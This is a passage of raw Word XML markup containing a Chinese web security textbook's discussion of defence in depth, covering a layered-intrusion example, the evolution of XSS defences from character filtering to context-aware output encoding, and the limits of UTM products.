        </w:rPr>
        <w:t>某矿泉水品牌曾经在广告中展示了一滴水的生产过程：经过十多层的安全过滤，去除有害物质，   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t>最终得到一滴饮用水。这种多层过滤的体系，就是一种纵深防御，是有立体层次感的安全方案。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="125" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>纵深防御并不是同一个安全方案要做两遍或多遍，而是要从不同的层面、不同的角度对系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>统做出整体的解决方案。我们常常听到“木桶理论”这个词，说的是一个桶能装多少水，不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t>取决于最长的那块板，而是取决于最短的那块板，也就是短板。设计安全方案时最怕出现短板，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="309" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="203" w:right="180"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>木桶的一块块板子，就是各种具有不同作用的安全方案，这些板子要紧密地结合在一起，才能组成一个不漏水的木桶。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="120" w:firstLine="391"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t>在常见的入侵案例中，大多数是利用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t>应用的漏洞，攻击者先获得一个低权限的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>然后通过低权限的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>上传更多的文件，并尝试执行更高权限的系统命令，尝试在服务器上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t>提升权限为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>；接下来攻击者再进一步尝试渗透内网，比如数据库服务器所在的网段。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="156"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>在这类入侵案例中，如果在攻击过程中的任何一个环节设置有效的防御措施，都有可能导</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>致入侵过程功亏一篑。但是世上没有万能灵药，也没有哪种解决方案能解决所有问题，因此非</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t>常有必要将风险分散到系统的各个层面。就入侵的防御来说，我们需要考虑的可能有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>应用安全、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>OS </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>系统安全、数据库安全、网络环境安全等。在这些不同层面设计的安全方案，将共同组成整个防御体系，这也就是纵深防御的思想。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="152"/>
        <w:ind w:left="203" w:right="168" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>纵深防御的第二层含义，是要在正确的地方做正确的事情。如何理解呢？它要求我们深入理解威胁的本质，从而做出正确的应对措施。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="151" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:68.639999pt;margin-top:46.271pt;width:299.7pt;height:115.95pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:2944;mso-wrap-distance-left:0;mso-wrap-distance-right:0" coordorigin="1373,925" coordsize="5994,2319">
            <v:shape style="position:absolute;left:1372;top:925;width:5994;height:2319" type="#_x0000_t75" stroked="false">
              <v:imagedata r:id="rId21" o:title=""/>
            </v:shape>
            <v:shape style="position:absolute;left:1449;top:1078;width:1523;height:152" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="151" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>过滤输入中的特殊符号</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:3734;top:1073;width:1823;height:152" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="151" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>对富文本开始做语法树分析</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:3866;top:2014;width:1172;height:168" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="167" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:b/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:b/>
                        <w:color w:val="FFFFFF"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>XSS Defense </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:b/>
                        <w:color w:val="FFFFFF"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>发展</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:2318;top:2842;width:1523;height:355" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="172" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="18" w:firstLine="0"/>
                      <w:jc w:val="center"/>
                      <w:rPr>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>区分富文本和非富文本</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="183" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="17" w:firstLine="0"/>
                      <w:jc w:val="center"/>
                      <w:rPr>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>encode </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>非富文本</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:5520;top:2866;width:623;height:152" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="151" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>综合方案</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <w10:wrap type="topAndBottom"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>防御技术的发展过程中，曾经出现过几种不同的解决思路，直到最近几年 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的防御思路才逐渐成熟和统一。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="3287" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>防御技术的发展过程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>在一开始的方案中，主要是过滤一些特殊字符，比如：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="2254" w:val="left" w:leader="none"/>
          <w:tab w:pos="3255" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="453" w:lineRule="auto"/>
        <w:ind w:left="604" w:right="4536"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>&lt;&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>笑傲江湖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>&gt;&gt;</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>会变成</w:t>
        <w:tab/>
        <w:t>笑傲江湖尖括号被过滤掉了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>但是这种粗暴的做法常常会改变用户原本想表达的意思，比如：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="1319" w:val="left" w:leader="none"/>
          <w:tab w:pos="2968" w:val="right" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="229"/>
        <w:ind w:left="604"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1&lt;2</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>可能会变成</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="231"/>
        <w:ind w:left="202" w:right="221" w:firstLine="401"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>造成这种“乌龙”的结果就是因为没有“在正确的地方做正确的事情”。对于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>防御， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>对系统取得的用户输入进行过滤其实是不太合适的，因为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>真正产生危害的场景是在用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>的浏览器上，或者说服务器端输出的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>页面，被注入了恶意代码。只有在拼装 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>输出，系统才能获得 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>上下文的语义，才能判断出是否存在误杀等情况。所以“在正确</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="309" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="203" w:right="223"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>的地方做正确的事情”，也是纵深防御的一种含义——必须把防御方案放到最合适的地方去解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-51"/>
        </w:rPr>
        <w:t>决。</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>防御的更多细节请参考“跨站脚本攻击”一章。</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="155"/>
        <w:ind w:left="603"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>近几年安全厂商为了迎合市场的需要，推出了一种产品叫 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>UTM</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，全称是“统一威胁管理”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="75"/>
        <w:ind w:left="202" w:right="122" w:hanging="101"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>reat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-101"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-34"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>几乎集成了所有主流安全产品的功能，比如防火墙、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>反垃圾邮件、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>IDS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>、反病毒等。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>UTM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>的定位是当中小企业没有精力自己做安全方案时，可以在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>一定程度上提高安全门槛。但是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>UTM </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>并不是万能药，很多问题并不应该在网络层、网关处解决，所以实际使用时效果未必好，它更多的是给用户买个安心。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="603"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>对于一个复杂的系统来说，纵深防御是构建安全体系的必要选择。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1052" w:val="left" w:leader="none"/>
          <w:tab w:pos="1053" w:val="left" w:leader="none"/>
        </w:tabs>
